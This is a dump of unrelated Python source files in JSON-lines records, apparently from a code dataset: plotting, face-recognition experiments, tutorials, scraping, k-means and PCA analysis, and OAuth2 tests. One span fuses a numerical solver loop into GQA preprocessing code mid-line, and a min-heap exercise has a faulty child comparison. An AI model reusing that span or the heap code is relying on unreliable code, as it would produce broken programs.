plot_mass(self, x, y, title, xlabel, ylabel, hold=False):\n self.ax.hold(hold)\n self.ax.plot(x, y)\n self.ax.set_title(title)\n self.ax.set_xlabel(xlabel)\n self.ax.set_ylabel(ylabel)\n self.draw()\n\n def plot_peaks(self, x, y, ind, title, xlabel, ylabel, x1=-1.0, x2=-1.0, hold=False):\n min_x = x1\n max_x = x2\n # dummy plot to apply the hold=True command\n self.ax.hold(False)\n self.ax.plot(x, y)\n self.draw()\n # real plot\n self.ax.hold(True)\n# self.ax.plot(x, y)\n self.ax.plot(x, y, 'b')\n self.ax.plot(x[ind], y[ind], '+', mfc=None, mec='r', mew=2, ms=8)\n self.ax.set_title(title)\n self.ax.set_xlabel(xlabel)\n self.ax.set_ylabel(ylabel)\n [x1, x2, y1, y2] = self.ax.axis()\n if min_x < 0.0:\n min_x = x1\n if max_x < 0.0:\n max_x = x2\n self.ax.axis([min_x, max_x, y1, y2])\n # test annotations\n x = x[ind]\n y = y[ind]\n for i, j in zip(x, y):\n text = \"{:.3f}\".format(float(j)) + \" (\" + \\\n \"{:.4f}\".format(float(i)) + \")\"\n# self.ax.annotate(\"{:.3f}\".format(float(j)), xy=(i, j), size=10)\n self.ax.annotate(text, xy=(i, j), xytext=(i, j), size=10)\n self.draw()\n","sub_path":"src/gui/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":5696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"227269172","text":"# code testing\n\n# Add project path to sys\nimport sys\nsys.path.append(\"./././\")\n\n# Import lib\nimport os\nimport pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\n\n# Import my own lib\nimport others.utilities as my_util\nfrom algorithms.paired_distance_alg import paired_distance_alg\n\n#############################################################################################\n\n# Experiment name\nexp = 'exp_11'\nexp_name = exp + '_alg_GenderEuclidean' # _alg_BaselineEuclidean _alg_GenderEuclidean\nquery_exp_name = exp_name\nexp_name = exp_name + 'OneThreshold'\n\ntrain_class_idx = [3, 4, 5] # [0, 1, 2, 3, 4, 5] [0, 1, 2] [3, 4, 5]\ntrain_class = np.array(['female-asian', 'female-black', 'female-caucasian', 'male-asian', 'male-black', 'male-caucasian'])\ntrain_class = list(train_class[train_class_idx])\ntrain_class_name = '-'\nquery_exp_name = query_exp_name + '_' + train_class_name.join(train_class)\n\ndataset_name = 'Diveface'\ndataset_exacted = 'resnet50'\n\n# Whole run round settings\nrun_exp_round = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] # define randomseed as list\ntest_size = 0.3\nvalid_size = 0.1\n\n# k-fold for training\nnumb_train_kfold = 1\ncv_run = -1 # -1 = run all fold, else, run only define\n\n# Algorithm parameters\n# param_grid = {'distanceFunc':'euclidean'}\n# combine_rule = 'concatenate'\n\npos_class = 'POS'\n\n#############################################################################################\n\n# Path\n# Dataset path\ndataset_path = my_util.get_path(additional_path=['.', '.', 'mount', 'FaceRecognitionPython_data_store', 'Dataset', 'Diveface'])\nexp_query_path = my_util.get_path(additional_path=['.', '.', 'mount','FaceRecognitionPython_data_store', 'Result', 'exp_result', exp, query_exp_name])\n\n#############################################################################################\n\n# Run experiment\nfor exp_numb in run_exp_round:\n # Load data\n if 'BaselineEuclidean' in exp_name:\n my_data = pd.read_csv((dataset_path + dataset_name + '_' + dataset_exacted + '_nonorm' + '.txt'), sep=\" \", header=0)\n else:\n dataset_exacted_model = ''\n if 'GenderEuclidean' in exp_name:\n dataset_exacted_model = ['exp_8', 'eer'] # exp_7 for race, exp_8 for gender\n else:\n dataset_exacted_model = ['exp_7', 'eer'] # exp_7 for race, exp_8 for gender\n my_data = pd.read_csv((dataset_path + dataset_name + '_' + dataset_exacted + '_' + dataset_exacted_model[0] + '_run_' + str(0) + '(' + dataset_exacted_model[1] + ').txt'), sep=\" \", header=0)\n # Separate data\n my_data_race = (my_data['gender'] + '-' + my_data['ethnicity']).values\n [training_sep_idx, test_sep_idx, valid_sep_idx] = my_util.split_data_by_id_and_classes(my_data.id.values, my_data_race, test_size=test_size, valid_size=valid_size, random_state=exp_numb)\n \n # Assign idx\n tmp_training_sep_idx = np.empty(0)\n tmp_valid_sep_idx = np.empty(0)\n tmp_test_sep_idx = np.empty(0)\n for train_class_idx in train_class:\n tmp_training_sep_idx = np.append(tmp_training_sep_idx, training_sep_idx[my_data_race[training_sep_idx] == train_class_idx])\n tmp_valid_sep_idx = np.append(tmp_valid_sep_idx, valid_sep_idx[my_data_race[valid_sep_idx] == train_class_idx])\n tmp_test_sep_idx = np.append(tmp_test_sep_idx, test_sep_idx[my_data_race[test_sep_idx] == train_class_idx])\n \n # Train data\n training_sep_idx = tmp_training_sep_idx.astype(int)\n x_training = my_data.iloc[training_sep_idx,8:].values\n y_race_training = my_data_race[training_sep_idx]\n y_class_training = my_data.id.iloc[training_sep_idx].values\n y_id_training = my_data.data_id.iloc[training_sep_idx].values\n # Valid data\n valid_sep_idx = tmp_valid_sep_idx.astype(int)\n x_valid = my_data.iloc[valid_sep_idx,8:].values\n y_race_valid = my_data_race[valid_sep_idx]\n y_class_valid = my_data.id.iloc[valid_sep_idx].values\n y_id_valid = my_data.data_id.iloc[valid_sep_idx].values\n # Test data\n test_sep_idx = tmp_test_sep_idx.astype(int)\n x_test = my_data.iloc[test_sep_idx,8:].values\n y_race_test = my_data_race[test_sep_idx]\n y_class_test = my_data.id.iloc[test_sep_idx].values\n y_id_test = my_data.data_id.iloc[test_sep_idx].values\n del my_data, my_data_race\n \n if 'BaselineEuclidean' in exp_name:\n x_training = preprocessing.normalize(x_training, norm='l2', axis=1, copy=True, return_norm=False)\n x_valid = preprocessing.normalize(x_valid, norm='l2', axis=1, copy=True, return_norm=False)\n x_test = preprocessing.normalize(x_test, norm='l2', axis=1, copy=True, return_norm=False)\n \n feature_size = x_training.shape[1]\n unique_class = {'pos':'POS', 'neg':'NEG'}\n \n # Initial model\n distance_model = paired_distance_alg()\n \n # Load model\n model = my_util.load_numpy_file(exp_query_path + query_exp_name + '_run_' + str(exp_numb) + '.npy')\n best_param = model['kernel_param']\n \n # Construct triplet training dataset\n triplet_paired_list = my_util.triplet_loss_paring(y_id_training, y_class_training, randomseed=exp_numb)\n [combined_training_xx, combined_training_yy, combined_training_id] = my_util.combination_rule_paired_list(x_training, y_id_training, triplet_paired_list, combine_rule=model['combine_rule'])\n \n label_classes = np.unique(combined_training_yy)\n \n for race_idx in train_class:\n save_exp_name = exp_name + '_' + race_idx\n # Result path\n exp_result_path = my_util.get_path(additional_path=['.', '.', 'mount','FaceRecognitionPython_data_store', 'Result', 'exp_result', exp, save_exp_name])\n # Make directory\n my_util.make_directory(exp_result_path)\n # Experiment name each seed\n exp_name_seed = save_exp_name + '_run_' + str(exp_numb)\n \n sep_idx = y_race_test == race_idx\n # Construct triplet test dataset\n triplet_paired_list = my_util.triplet_loss_paring(y_id_test[sep_idx], y_class_test[sep_idx], randomseed=exp_numb)\n [combined_test_xx, combined_test_yy, combined_test_id] = my_util.combination_rule_paired_list(x_test[sep_idx,:], y_id_test[sep_idx], triplet_paired_list, combine_rule=model['combine_rule'])\n \n predictedScores, predictedY, _ = distance_model.predict(combined_test_xx[:,0:feature_size], combined_test_xx[:,feature_size:], combined_test_yy, unique_class, model['kernel_param'], distance_metric=model['distanceFunc'])\n \n # Eval performance\n # Performance metrics\n performance_metric = my_util.classification_performance_metric(combined_test_yy, predictedY, np.array(['NEG', 'POS']))\n # Biometric metrics\n performance_metric.update(my_util.biometric_metric(combined_test_yy, np.ravel(predictedScores), pos_class, score_order='ascending', threshold_step=0.01))\n\n # Save score\n exp_result = {'distanceFunc':model['distanceFunc'], 'kernel_param':model['kernel_param'], 'combine_rule':model['combine_rule'], 'randomseed': exp_numb, 'label_classes': label_classes, 'algorithm':model['algorithm'], 'experiment_name': save_exp_name, 'trueY':combined_test_yy, 'predictedScores':predictedScores, 'predictedY':predictedY, 'test_image_id':combined_test_id, 'dataset_name':dataset_name}\n exp_result.update(performance_metric)\n my_util.save_numpy(exp_result, exp_result_path, exp_name_seed)\n\n print('Finished ' + exp_name_seed)\n\n del performance_metric\n del predictedScores, predictedY\n del combined_test_xx, combined_test_yy, combined_test_id\n del exp_result\n \n del best_param, label_classes\n del combined_training_xx, combined_training_yy, combined_training_id\n\nprint()\n","sub_path":"run_experiments/exp_11/exp_11_alg_EuclideanOneThreshold.py","file_name":"exp_11_alg_EuclideanOneThreshold.py","file_ext":"py","file_size_in_byte":7676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"263726284","text":"#coding:cp949\n\n#\n# 1. while, continue, break\n#\nresult1 = [];\nnum = 0;\nmaximumVal = 10;\nwhile True:\n # while문 탈출 조건\n if num > maximumVal:\n break;\n\n # 짝수는 결과에 담음\n if num % 2 == 0:\n result1.append(num);\n num += 1;\nprint(\"짝수 : \", result1);\nprint(\"\\n\");\n\n#\n# 2. range function\n#\nresult2 = [];\nfor x in range(0, 11, 2):\n result2.append(x);\nprint(\"짝수 : \", result2);\nprint(\"\\n\");\n\n#\n# 3. filter function\n#\n\n# 필터 함수\ndef IsGreaterThanZero(val):\n if val > 0:\n return True;\n return False;\n\n# 수정된 코드\ndef positive(i):\n return list(filter(IsGreaterThanZero, i));\n\nprint(positive([1,-3,2,0,-5,6]));","sub_path":"B/choaw/04_conditional/04_03_continue_break_filter.py","file_name":"04_03_continue_break_filter.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"585850947","text":"import sqlite3\n\n\nclass Point(object):\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __conform__(self, protocol):\n \"\"\" Convert data type \"\"\"\n if protocol is sqlite3.PrepareProtocol:\n return '{};{}'.format(self.x, self.y)\n\n\nclass Point2(object):\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n\ndef adapt_poit(p):\n return '{};{}'.format(p.x, p.y)\n\n\nconn = sqlite3.connect(':memory:')\nc = conn.cursor()\n\n# Adapt in class.__conform__\np = Point(4.0, -3.2)\nc.execute('SELECT ?', (p,))\nprint(c.fetchall())\n\n# Adapt as a registered callable\nsqlite3.register_adapter(Point2, adapt_poit)\np = Point2(4.0, -3.2)\nc.execute('SELECT ?', (p,))\nprint(c.fetchall())\n","sub_path":"standard-library/sqlite3/adapter.py","file_name":"adapter.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"64309635","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 10 00:02:02 2020\n\n@author: ankit\n\"\"\"\n\nimport numpy as np\nimport math\n\n\nA=np.array([0.2,0.1,1,1,0,0.1,4,-1,1,-1,1,-1,60,0,-2,1,1,0,8,4,0,-1,-2,4,700]).reshape(5,5)\nB=np.array([1,2,3,4,5])\n#Xi=np.array([1.0,1.0,1.0,1.0,1.0])\nXi=np.zeros(5)\nx=np.zeros(5)\nTOL=0.01\nN=100\nr=0\n\nk=1\nwhile k0:\n images.append({'height':height, 'width':width, 'file_name':file_name, 'id':id})\n image_names.append(file_name) \n return object_annotations, images, image_names, labels\n\ntrain_object_annotations, train_images, train_image_names, all_labels = get_preprocessed_data(gqa_train_scenegraph)\nvalid_object_annotations, valid_images, valid_image_names, all_labels = get_preprocessed_data(gqa_val_scenegraph, all_labels) \ntrain_object_coco_format_data = {'annotations':train_object_annotations, 'categories':gqa_object_categories, 'images':train_images}\nvalid_object_coco_format_data = {'annotations':valid_object_annotations, 'categories':gqa_object_categories, 'images':valid_images}\n\ndump_dir = gqa_dir+'/data/preprocessed/object_coco_format_data'\nif not os.path.exists(dump_dir):\n os.mkdir(dump_dir)\npkl.dump(gqa_objects_hierarchy, open(dump_dir+'/hierarchy_names.pkl', 'wb')) \nfw = open(dump_dir+'/category_names.txt','w')\nfor k in gqa_object_categories:\n fw.write(k['name'].strip()+'\\n')\nfw.close()\nsys.exit(1)\nif not os.path.exists(dump_dir+'/annotations'):\n os.mkdir(dump_dir+'/annotations')\njson.dump(train_object_coco_format_data, open(dump_dir+'/annotations/train_instances.json', 'w'))\njson.dump(valid_object_coco_format_data, open(dump_dir+'/annotations/valid_instances.json', 'w'))\nfw = open(dump_dir+'/train_images.txt', 'w')\nfor name in train_image_names:\n fw.write(name.strip()+'\\n')\nfw = open(dump_dir+'/valid_images.txt', 'w')\nfor name in valid_image_names:\n fw.write(name.strip()+'\\n')\nif not os.path.exists(dump_dir+'/labels'):\n os.mkdir(dump_dir+'/labels/')\nfor id in all_labels:\n fw = open(dump_dir+'/labels/'+str(id)+'.txt', 'w')\n for entry in all_labels[id]:\n fw.write(entry.strip()+'\\n')\n fw.close()\n","sub_path":"analysis/get_coco_hierarchical_annotation_format_for_objects.py","file_name":"get_coco_hierarchical_annotation_format_for_objects.py","file_ext":"py","file_size_in_byte":5487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"234234094","text":"import torch\nfrom torchvision import transforms\nfrom torch.autograd import Variable\nimport numpy as np\nfrom PIL import Image\n\n\nclass AangleClassHandle:\n def __init__(self, model_path, net, gpu_id=None):\n \"\"\"\n 初始化pytorch模型\n :param model_path: 模型地址(可以是模型的参数或者参数和计算图一起保存的文件)\n :param net: 网络计算图,如果在model_path中指定的是参数的保存路径,则需要给出网络的计算图\n\n :param gpu_id: 在哪一块gpu上运行\n \"\"\"\n \n if gpu_id is not None and isinstance(gpu_id, int) and torch.cuda.is_available():\n self.device = torch.device(\"cuda:{}\".format(gpu_id))\n else:\n self.device = torch.device(\"cpu\")\n self.net = torch.load(model_path, map_location=self.device)\n print('device:', self.device)\n \n self.trans = transforms.Compose([\n transforms.Resize((48, 196)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])\n \n if net is not None:\n # 如果网络计算图和参数是分开保存的,就执行参数加载\n net = net.to(self.device)\n \n try:\n sk = {}\n for k in self.net:\n sk[k[7:]] = self.net[k]\n \n net.load_state_dict(sk)\n except:\n net.load_state_dict(self.net)\n \n self.net = net\n print('load model')\n self.net.eval()\n \n def predict(self, im):\n \"\"\"\n 预测\n \"\"\"\n im = Image.fromarray(im).convert(\"RGB\")\n image = self.trans(im)\n image = image.to(self.device)\n image = image.view(1, *image.size())\n image = Variable(image)\n preds = self.net(image)\n preds = torch.softmax(preds, 1)\n preds = preds.cpu().detach().numpy()\n preds = np.argmax(preds)\n return preds\n","sub_path":"backend/ocr_core/angle_class/angle_class.py","file_name":"angle_class.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"210086444","text":"#Maan Qraitem\n#CS 251 \n#Analysis \n\nimport numpy as np \nfrom scipy import stats\nimport scipy.cluster.vq as vq\nimport data \nimport PCAData\nimport ClusterData\nimport random as rand\nimport math\n\n#return the a list of lists containing [min, max]\ndef data_range(headers, data):\n\textracted = data.get_LimitedHeaders(headers)\n\tAllmin = extracted.min(axis = 0)\n\tAllmax = extracted.max(axis = 0)\n\tfinal = [[Allmin[0, i], Allmax[0, i]] for i in range(Allmin.shape[1])]\n\treturn final\n\n#return the mean at each header \ndef mean(headers, data): \n\textracted = data.get_LimitedHeaders(headers)\n\treturn [x[0, 0] for x in np.mean(extracted, axis = 0).T]\n\n#return the standard deviation at each header\ndef stdev(headers, data): \n\textracted = data.get_LimitedHeaders(headers)\n\treturn [x[0, 0] for x in np.std(extracted, axis = 0).T]\n\n#normalize each column seperately\ndef normalize_columns_separately(headers, data):\n\textracted = data.get_LimitedHeaders(headers)\n\textracted = extracted - extracted.min(axis = 0)\n\textracted = extracted/(extracted.max(axis = 0))\n\treturn extracted\n\n#normalize the columns together \ndef normalize_columns_together(headers, data):\n\textracted = data.get_LimitedHeaders(headers)\n\textracted = extracted - np.amin(extracted)\n\textracted = np.divide(extracted, np.amax(extracted))\n\treturn extracted\n\n#calculate the median at each header. \ndef median(headers, data):\n\textracted = data.get_LimitedHeaders(headers)\n\treturn np.median(extracted, axis = 0) \n\n#calculate the range at each header. \ndef get_range(headers, data):\n\textracted = data.get_LimitedHeaders(headers)\n\treturn np.ptp(extracted,axis=0)\n\n#preforms linear regression on a single independant variable.\ndef single_linear_regression(data_obj, ind_var, dep_var):\n\tX = np.array(data_obj.get_LimitedHeaders([ind_var]))\n\tY = np.array(data_obj.get_LimitedHeaders([dep_var]))\n\tslope, intercept, r_value, p_value, std_err = stats.linregress(X.reshape(X.shape[0]), Y.reshape(X.shape[0]))\t\n\treturn (slope, intercept, r_value, p_value, std_err, X.min(axis = 0), X.max(axis = 0), Y.min(axis = 0), Y.max(axis = 0))\n\n#preforms linear regression on multiple independant variables\ndef linear_regression(data_obj, ind, dep):\n\n\ty = data_obj.get_LimitedHeaders([dep])\n\tA = data_obj.get_LimitedHeaders(ind)\n\n\tA = np.column_stack((A, np.ones(A.shape[0])))\n\n\tAAinv = np.linalg.inv(np.dot(A.T, A))\n\n\tx = np.linalg.lstsq(A, y)\n\n\tb = x[0] \n\tN = y.shape[0]\n\tC = b.shape[0]\n\tdf_e = N - C\n\tdf_r = C - 1 \n\terror = y - np.dot(A, b)\n\tsse = np.dot(error.T, error) / df_e\n\tstderr = np.sqrt(np.diagonal(sse[0,0] * AAinv))\n\tt = b.T / stderr\n\tp = 2 * (1 - stats.t.cdf(abs(t), df_e))\n\tr2 = 1 - error.var() / y.var()\n\t\n\treturn (b, sse, r2, t, p)\n\n\n\n# Calculates the PCA for the selected headers. \ndef pca(d, headers, normalize=True):\n\tif normalize:\n\t\tA = normalize_columns_separately(headers, d)\n\n\telse: \n\t\tA = d.get_LimitedHeaders(headers) \n\n\tprint(A)\n\n\tm = np.mean(A, axis = 0) \n\tD = A - m \n\tU, S, V = np.linalg.svd(D, full_matrices = False)\n\teigenvalues = np.square(S) / (A.shape[0] - 1)\n\tprojected_data = ((V) * (D.T)).T\n\n\treturn PCAData.PCAData(projected_data, V, eigenvalues, m, headers)\n\n\n\n# computes the kmeans clutser and represent that by returning codebook, codes, and representation error.\ndef kmeans_numpy( d, headers, K, whiten = True):\n\n\tA = d.get_LimitedHeaders(headers)\n\tW = vq.whiten(A)\n\n\tcodebook, bookerror = vq.kmeans(W, K) \n\tcodes, error = vq.vq(W, codebook) \n\n\treturn codebook, codes, error\n\n\ndef kmeans_init(A, K):\n\t# Hint: generate a list of indices then shuffle it and pick K\n\t# Hint: Probably want to check for error cases (e.g. # data points < K)\n\n\tpickfrom = A[:]\n\tpicks = [] \n\tfinal = np.zeros((K, A.shape[1]))\n\n\tif (A.shape[0] < K):\n\t\tprint(\"Your data doesn't have enough data points\")\n\t\treturn \n\n\twhile len(picks) != K: \n\t\tpick = rand.randint(0, A.shape[0] - 1) \n\t\tif (pick not in picks): \n\t\t\tfinal[len(picks)] = pickfrom[pick, :]\n\t\t\tpicks.append(pick) \n\n\treturn(final)\n\n\n#computes L2 distance\ndef L2_distance(codebook, A): \n\tdiff = codebook - A\n\tsquared = np.square(diff) \n\tsummed = np.sum(squared, axis = 1)\n\tsquare_root = np.sqrt(summed)\n\treturn square_root\n\n#computes L1 distance\ndef L1_distance(codebook, A): \n\tdiff = np.abs(codebook - A)\n\tsummed = np.sum(diff, axis = 1)\n\treturn summed\n\n\n\n#computes the mean distance of point i from every point in the same cluster as i.\ndef compute_ai(A, Point_index, codes):\n\tindices = [i for i, x in enumerate(codes) if int(x) == int(codes[Point_index])]\n\ta_i = 0 \n\t\n\tfor index in indices:\n\t\ta_i += L2_distance(A[Point_index, :], A[index, :])[0,0]\n\t\n\treturn (a_i/len(indices))\n\n\n#computes the mean distance of point i from every point in the second nearst cluster\ndef compute_bi(A, Point_index, codes, codebook): \n\n\tdistance = L2_distance(codebook, A[Point_index,:]) \n\tmin_val = math.inf\n\tsmallest_index = 0\n\tfor j, row in enumerate(distance): \n\t\tif (row[0] < min_val and j != int(codes[Point_index])):\n\t\t\tmin_val = row[0]\n\t\t\tsmallest_index = j\n\n\tindices = [i for i, x in enumerate(codes) if int(x) == smallest_index]\n\tb_i = 0\n\n\tfor index in indices:\n\t\tb_i += L2_distance(A[Point_index, :], A[index, :])[0,0]\n\treturn (b_i/len(indices))\n\n\n#computes the silhouette_average over all data points\ndef silhouette_average(d, headers, codebook, codes):\n\tA = d.get_LimitedHeaders(headers)\n\tN = A.shape[0]\n\tfinal = 0 \n\tnewCodes = codes.reshape(codes.shape[0]).tolist()\n\tfor i in range(N): \n\t\ta_i = compute_ai(A, i, codes)\n\t\tb_i = compute_bi(A, i, codes, codebook)\n\t\tfinal += (b_i - a_i)/(max(b_i, a_i))\n\n\treturn final/N\n\n\n#Classify data points according to their closest clusters. \ndef kmeans_classify(A, codebook, measure):\n\n\tdistances = np.zeros((A.shape[0], codebook.shape[0]))\n\tids = np.zeros((A.shape[0], 1))\n\tdistances = np.zeros((A.shape[0], 1))\n\n\tfor i in range(A.shape[0]): \n\n\t\tif (measure == \"L1\"):\n\t\t\tdistance = L1_distance(codebook, A[i,:])\n\t\t\n\t\telif (measure == \"L2\"):\n\t\t\tdistance = L2_distance(codebook, A[i,:]) \n\n\t\tids[i, 0] = np.argmin(distance)\n\t\tdistances[i, 0] = np.min(distance)\n\n\treturn (ids, distances)\n\n# Given a data matrix A and a set of K initial means, compute the optimal\n# cluster means for the data and an ID and an error for each data point\ndef kmeans_algorithm(A, means, measure):\n\t# set up some useful constants\n\tMIN_CHANGE = 1e-7 # might want to make this an optional argument\n\tMAX_ITERATIONS = 100 # might want to make this an optional argument\n\tD = means.shape[1] # number of dimensions\n\tK = means.shape[0] # number of clusters\n\tN = A.shape[0] # number of data points\n\n\t# iterate no more than MAX_ITERATIONS\n\n\n\tfor i in range(MAX_ITERATIONS): \n\n\t\tcodes, distances = kmeans_classify(A, means, measure)\n\n\n\t\tnewmeans = np.zeros((K, D))\n\t\tcounts = np.zeros((K, 1))\n\n\t\tA = np.array(A)\n\n\t\tfor num in range(N): \n\t\t\tnewmeans[int(codes[num, 0]), :] += A[num,:]\n\t\t\tcounts[int(codes[num, 0]), 0] += 1 \n\n\t\tfor num in range(K): \n\t\t\tif counts[num, 0] != 0:\n\t\t\t\tnewmeans[num] /= counts[num, 0] \n\t\t\telse:\n\t\t\t\tnewmeans[num] = A[rand.randint(0, A.shape[0]), :]\n\n\t\tdiff = np.sum(np.square(means - newmeans))\n\t\tmeans = newmeans\n\t\tif diff < MIN_CHANGE:\n\t\t\tbreak\n\n\tcodes, errors = kmeans_classify( A, means, measure )\n\n\t# return the means, codes, and errors\n\treturn (means, codes, errors)\n\n\ndef kmeans(d, headers, K, measure, whiten=True):\n\t'''Takes in a Data object, a set of headers, and the number of clusters to create\n\tComputes and returns the codebook, codes and representation errors. \n\t'''\n\n\tA = d.get_LimitedHeaders(headers)\n\t\n\tif whiten: \n\t\tW = vq.whiten(A)\n\telse:\n\t\tW = A \n\n\tcodebook = kmeans_init(W, K) \n\n\tcodebook, codes, errors = kmeans_algorithm(W, codebook, measure) \n\n\treturn ClusterData.ClusterData(d.get_LimitedHeaders(headers), headers, codebook, codes, errors)\n\n ","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":7707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"247108855","text":"import requests\nfrom bs4 import BeautifulSoup\n\nfor page_number in range(1, 6):\n data = requests.get(\"https://series.naver.com/ebook/top100List.nhn?page=\"+str(page_number))\n result = BeautifulSoup(data.text)\n list_book = result.select(\"div.lst_thum_wrap li\")\n for book in list_book:\n name = book.select_one(\"a strong\").text\n writer = book.select_one(\"span.writer\").text\n print(name, writer)\n\n","sub_path":"WEEK3_HW1.py","file_name":"WEEK3_HW1.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"391913792","text":"#1 TOP\nn = int(input())\ntop = list(map(int,input().split()))\nstack = []\nresult = []\n\nfor i in range(n):\n while stack:\n if stack[-1][1] > top[i]: # [-1][1] 이므로 stack 맨 끝쪽에서 1번째 배열에서 1번째 데이터를 top[i]와 비교\n result.append(stack[-1][0] + 1) # 배열은 0번째부터, 수신탑은 1번부터 시작하므로 수를 맞춰주고 result에 데이터 추가하기\n break\n stack.pop() # 배열의 맨 끝 데이터 비우기\n\n if not stack:\n result.append(0) # 스택이 비면 레이저를 수신한 탑이 없다는 뜻이므로 result에 \"0\" 데이터 추가\n\n stack.append([i, top[i]]) # 스택에 현재 신호탑 데이터 추가\n\nfor i in range(n):\n print(result[i], end=' ')\n\n\n#2 MIN HEAP\nclass minHeap:\n def __init__(self):\n self.queue = [None]\n\n def swap(self, x, y):\n self.queue[x], self.queue[y] = self.queue[y], self.queue[x]\n\n def insert(self, n):\n self.queue.append(n)\n i = len(self.queue) - 1\n while i>1:\n parent = i // 2\n if self.queue[i] < self.queue[parent]:\n self.swap(i, parent)\n i = parent\n else: break\n def delete(self):\n if len(self.queue) > 1:\n self.swap(1, len(self.queue)-1)\n ans = self.queue.pop(len(self.queue)-1)\n self.minHeapify(1)\n else: ans = 0\n return ans\n def minHeapify(self, i):\n left = i*2\n right = i*2 + 1\n smallest = i\n\n if left <= len(self.queue)-1 and self.queue[left] < self.queue[smallest]:\n smallest = left\n if right <= len(self.queue)-1 and self.queue[left] < self.queue[smallest]:\n smallest = right\n if smallest != i:\n self.swap(i, smallest)\n self.minHeapify(smallest)\n\nif __name__ == '__main__':\n num = int(input())\n heap = minHeap()\n for i in range(num):\n x = int(input())\n if x == 0:\n print(heap.delete())\n else:\n heap.insert(x)","sub_path":"pre_train/week5/w5_2.py","file_name":"w5_2.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"31879701","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport pytest\nfrom sqlalchemy.exc import IntegrityError\n\nfrom lti.models import OAuth2Credentials\nfrom lti.models import OAuth2AccessToken\n\n\nclass TestOAuth2Credentials(object):\n\n def test_it_persists_the_id_secret_and_server(self, db_session):\n db_session.add(OAuth2Credentials(client_id=\"TEST_ID\",\n client_secret=\"TEST_SECRET\",\n authorization_server=\"TEST_AUTH_SERVER\"))\n\n persisted = db_session.query(OAuth2Credentials).filter_by(client_id=\"TEST_ID\").one()\n assert persisted.client_id == \"TEST_ID\"\n assert persisted.client_secret == \"TEST_SECRET\"\n assert persisted.authorization_server == \"TEST_AUTH_SERVER\"\n\n def test_the_access_tokens_are_available_as_the_access_tokens_property(self,\n factories):\n credentials = factories.OAuth2Credentials()\n access_tokens = [\n factories.OAuth2AccessToken(credentials=credentials),\n factories.OAuth2AccessToken(credentials=credentials),\n factories.OAuth2AccessToken(credentials=credentials),\n ]\n\n assert credentials.access_tokens == access_tokens\n\n def test_you_cant_have_two_oauth2_credentials_with_the_same_id(self, db_session):\n db_session.add(OAuth2Credentials(client_id=\"TEST_ID\",\n client_secret=\"FIRST_SECRET\",\n authorization_server=\"FIRST_AUTH_SERVER\"))\n db_session.add(OAuth2Credentials(client_id=\"TEST_ID\",\n client_secret=\"SECOND_SECRET\",\n authorization_server=\"SECOND_AUTH_SERVER\"))\n\n expected_message = ('duplicate key value violates unique constraint '\n '\"pk__oauth2_credentials\"')\n with pytest.raises(IntegrityError, match=expected_message):\n db_session.flush()\n\n def test_you_can_have_two_oauth2_credentials_with_the_same_server(self, db_session):\n # You can have two OAuth2Credential's for the same server in the db,\n # as long as they have different IDs. This might happen if two\n # different admins create two different developer keys for us in the\n # same Canvas instance, for example.\n db_session.add(OAuth2Credentials(client_id=\"FIRST_ID\",\n client_secret=\"FIRST_SECRET\",\n authorization_server=\"TEST_AUTH_SERVER\"))\n db_session.add(OAuth2Credentials(client_id=\"SECOND_ID\",\n client_secret=\"SECOND_SECRET\",\n authorization_server=\"TEST_AUTH_SERVER\"))\n\n db_session.commit()\n\n @pytest.mark.filterwarnings(\"ignore:Column 'oauth2_credentials.client_id' is marked as a member of\")\n def test_id_is_required(self, db_session):\n db_session.add(OAuth2Credentials(client_secret=\"FIRST_SECRET\",\n authorization_server=\"TEST_AUTH_SERVER\"))\n\n with pytest.raises(IntegrityError):\n db_session.flush()\n\n def test_id_cant_be_None(self, db_session):\n db_session.add(OAuth2Credentials(client_id=None,\n client_secret=\"TEST_SECRET\",\n authorization_server=\"TEST_AUTH_SERVER\"))\n\n with pytest.raises(IntegrityError):\n db_session.flush()\n\n def test_client_secret_is_required(self, db_session):\n db_session.add(OAuth2Credentials(client_id=\"TEST_ID\",\n authorization_server=\"TEST_AUTH_SERVER\"))\n\n with pytest.raises(IntegrityError):\n db_session.flush()\n\n def test_client_secret_cant_be_None(self, db_session):\n db_session.add(OAuth2Credentials(client_id=\"TEST_ID\",\n client_secret=None,\n authorization_server=\"TEST_AUTH_SERVER\"))\n\n expected_message = 'null value in column \"client_secret\" violates not-null constraint'\n with pytest.raises(IntegrityError, match=expected_message):\n db_session.flush()\n\n def test_authorization_server_is_required(self, db_session):\n db_session.add(OAuth2Credentials(client_id=\"TEST_ID\", client_secret=\"TEST_SECRET\"))\n\n with pytest.raises(IntegrityError):\n db_session.flush()\n\n def test_authorization_server_cant_be_None(self, db_session):\n db_session.add(OAuth2Credentials(client_id=\"TEST_ID\",\n client_secret=\"TEST_SECRET\",\n authorization_server=None))\n\n expected_message = ('null value in column \"authorization_server\" '\n 'violates not-null constraint')\n with pytest.raises(IntegrityError, 